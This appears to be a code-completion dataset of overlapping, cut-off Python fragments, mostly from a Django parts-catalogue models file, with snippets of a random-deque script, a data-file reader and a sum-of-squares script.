": December 27, 2019 # # # ############################################################################################ from random import randint from",
"in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque:",
"_ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext <",
"< 0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for",
"random import randint from collections import deque def create_random_deque(low: int, high: int, size:",
"from collections import deque def create_random_deque(low: int, high: int, size: int) -> deque:",
"# # Program Author : <NAME> <<EMAIL>> # # Creation Date : December",
"range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}')",
"Adds more number of elements to a deque object from an iterable #",
"for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\":",
"ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)])",
"for new deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque,",
"# # # ############################################################################################ from random import randint from collections import deque def",
"############################################################################################ # # # Program purpose: Adds more number of elements to a",
"-> None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque')"
] |
[
"(\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\")",
"__str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle",
"to handle this feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\"",
"feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel):",
"PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan",
"= models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure",
"= _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"]",
"def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20,",
"of Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name",
"[\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class",
") selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS",
"Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField(",
"[\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way",
"_(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber",
"SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\",",
"bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") )",
"_(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view',",
"str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\")",
"Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self): return reverse('item_class_read',",
"= _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return",
"Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"),",
"Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return",
"_ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel",
"= ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber =",
"= _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering",
"class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\",",
"= _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return",
"TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table =",
"(\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField(",
"django.db import models from django.utils.translation import gettext_lazy as _ from django.urls import reverse",
"django.utils.translation import gettext_lazy as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager",
"AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan",
"(\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\",",
"= _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def",
"on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural =",
"parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\",",
"models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status =",
"_(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering =",
"(\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code",
"\"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS",
"max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit",
"!Find way to handle this feat in template @property def add_leading_zero(self): return str(self.selling_price)",
"name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table =",
"PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20,",
"add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit",
"db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\")",
"(\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"),",
"= _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager,",
"verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table",
"\"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code =",
"max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField(",
"verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\")",
"import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan",
"= models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") )",
"Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of",
"partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"),",
"\"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") )",
"max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number",
"parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = (",
"self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type =",
"from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"),",
"max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta:",
"Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\",",
"class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit",
"from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class",
"from django.db import models from django.utils.translation import gettext_lazy as _ from django.urls import",
"choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table =",
"reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in template @property def",
"ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) #",
"(\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), )",
") unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\")",
"models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure =",
"django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager,",
"class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part",
"verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self):",
"def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in",
"(\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = (",
"def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\")",
"class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField(",
"import gettext_lazy as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from",
"\"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts",
"Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper()",
") status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"),",
"ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField(",
"verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price =",
"class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta:",
"as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import",
"TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"),",
"models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE )",
"max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price",
") bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\")",
"_(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def",
"__str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") )",
"= models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE",
"db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering =",
"verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def",
"(\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200,",
"return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type",
") class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural =",
"models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part",
"= _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self):",
"get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in template",
"Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um",
"\"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\")",
"from django.utils.translation import gettext_lazy as _ from django.urls import reverse from parts.core.managers import",
"+ \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") )",
"def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to",
"return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this",
"template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um =",
"# !Find way to handle this feat in template @property def add_leading_zero(self): return",
"\"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200,",
"\"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"),",
"return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of",
"verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table",
"max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code",
"TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge",
"class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\")",
"verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey(",
") class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts",
"= [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find",
"\"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\",",
") PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), )",
"um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\")",
"max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta:",
"source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode",
"verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200,",
"import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel):",
"of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return",
"TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"),",
"import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\",",
"Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name =",
"= models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE )",
"verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural",
"handle this feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class",
"\"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\",",
"choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling",
") class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural =",
"models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class",
"gettext_lazy as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models",
"models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name =",
"Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering",
"models from django.utils.translation import gettext_lazy as _ from django.urls import reverse from parts.core.managers",
"reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE",
"( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField(",
"_(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self):",
"No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"),",
"@property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField(",
"status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE",
"= models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name =",
"Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\",",
"UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table",
") source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200,",
"return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in template @property",
"Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural",
"= models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status",
"verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self):",
") partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source",
"\".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class",
"verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"]",
"_(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel):",
"db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\")",
"in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um",
"verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um class",
"charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name",
"selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS )",
"unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name",
"( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"),",
"this feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager,",
"= models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name",
"Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number",
"Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS =",
"= models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name =",
"class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\")",
"self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat",
"Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def",
"models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class",
"= models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\")",
") charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\")",
"args=[str(self.id)]) # !Find way to handle this feat in template @property def add_leading_zero(self):",
"verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"]",
"Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self): return reverse('item_class_read', args=[str(self.id)])",
"_(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self): return",
"models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") )",
"= [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20,",
"import models from django.utils.translation import gettext_lazy as _ from django.urls import reverse from",
"verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code =",
"= _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering",
"Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural",
"models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part",
"from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE =",
"Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField(",
"= _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def",
"PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber",
"Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"),",
"way to handle this feat in template @property def add_leading_zero(self): return str(self.selling_price) +",
"= ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan",
"_(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering =",
"of Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\")",
"verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of",
"_(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self):",
"Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)])"
] |
[
"<reponame>Edinburgh-Genome-Foundry/CAB<gh_stars>10-100 import os data_path = os.path.join(\"app\", \"data\", \"example_data_file.txt\") with open(data_path, \"r\") as f:",
"import os data_path = os.path.join(\"app\", \"data\", \"example_data_file.txt\") with open(data_path, \"r\") as f: DATA",
"os data_path = os.path.join(\"app\", \"data\", \"example_data_file.txt\") with open(data_path, \"r\") as f: DATA =",
"data_path = os.path.join(\"app\", \"data\", \"example_data_file.txt\") with open(data_path, \"r\") as f: DATA = f.read()"
] |
[] |
[
"+= i*i sqos += i diff = (sqos * sqos) - sosq print",
"sosq = 0 sqos = 0 for i in range(1, 101): sosq +=",
"i in range(1, 101): sosq += i*i sqos += i diff = (sqos",
"* sqos) - sosq print \"Sum of Squares: \", str(sosq) print \"Squares of",
"sqos) - sosq print \"Sum of Squares: \", str(sosq) print \"Squares of Sum:",
"in range(1, 101): sosq += i*i sqos += i diff = (sqos *",
"= 0 sqos = 0 for i in range(1, 101): sosq += i*i",
